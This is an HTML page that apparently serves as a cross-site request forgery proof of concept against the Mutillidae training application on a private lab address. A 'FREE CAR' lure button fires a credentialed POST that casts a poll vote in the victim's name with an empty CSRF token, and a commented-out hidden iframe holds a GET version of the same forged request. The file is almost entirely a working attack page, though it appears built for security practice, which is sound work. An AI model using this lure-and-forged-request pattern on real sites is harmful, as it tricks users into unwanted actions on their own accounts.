<html>
<head>


<style>
	body {
   		background-color: #FFFFFF;
	}
	
	.button {
  background-color: #FF0000;
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
}

</style>
<script>

function poll() {

    alert("Better luck next time!");

    var params = 'choice=wireshark&initials=';
    var reqBody = '&user-poll-php-submit-button=Submit+Vote&csrf-token=';
    params = params.concat(reqBody);
    var http = new XMLHttpRequest();
    http.open('POST', 'http://192.168.146.128/mutillidae/index.php?page=user-poll.php', true);
    http.withCredentials = true;
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.setRequestHeader('Content-length', params.length);
    http.setRequestHeader('Connection', 'close');
    http.send(params);

}

</script>
</head>
<body>

<!--<iframe src="http://192.168.146.128/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=&user-poll-php-submit-button=Submit+Vote" style="display:none"></iframe>-->

<center>
	<h1><button class="button" onclick="poll()">FREE CAR</button></h1>
	<h2> Click this button to win a free car! </h2>
	<img src="freecar.png" width="600px" height="400px" class="pic1">
</center>
</body>

</html>
